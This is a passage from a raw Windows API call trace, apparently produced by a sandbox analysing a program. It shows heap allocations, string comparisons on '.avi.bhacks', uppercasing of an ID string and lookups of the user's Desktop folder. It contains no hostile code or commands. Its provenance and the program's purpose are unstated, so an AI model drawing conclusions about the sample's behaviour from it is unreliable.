cchCount2=6) returned 3 [0101.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0101.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6728 [0101.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0101.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6728 | out: hHeap=0x2af0000) returned 1 [0101.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0101.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0101.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0101.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0101.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0101.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0101.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0101.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6680 | out: hHeap=0x2af0000) returned 1 [0101.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0101.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0101.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0101.642] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0101.642] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0101.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0101.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a726a8 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0101.642] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0101.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0101.642] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0101.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0101.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66f0 [0101.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0101.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0101.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0101.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0101.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0101.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0101.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0101.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0101.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0101.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0101.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75948 [0101.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66f0 | out: hHeap=0x2af0000) returned 1 [0101.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0101.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0101.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0101.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72708 [0101.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0101.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0101.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0101.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0101.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0101.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0101.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0101.646] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0101.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0101.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0101.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0101.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0101.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0101.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0101.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0101.646] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0101.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0101.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6568 [0101.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0101.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0101.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0101.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0101.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0101.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0101.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0101.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0101.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0101.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0101.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0101.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0101.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6568 | out: hHeap=0x2af0000) returned 1 [0101.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0101.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72778 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72738 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0101.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0101.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0101.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0101.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0101.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0101.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0101.648] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0101.648] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0101.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0101.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0101.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0101.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0101.648] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0101.649] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0101.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0101.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0101.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0101.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0101.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0101.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0101.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0101.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0101.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0101.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0101.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0101.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0101.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0101.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0101.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0101.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0101.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0101.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0101.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0101.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0101.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0101.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.650] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0101.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0101.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0101.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0101.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0101.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0101.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0101.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0101.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0101.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0101.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0101.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 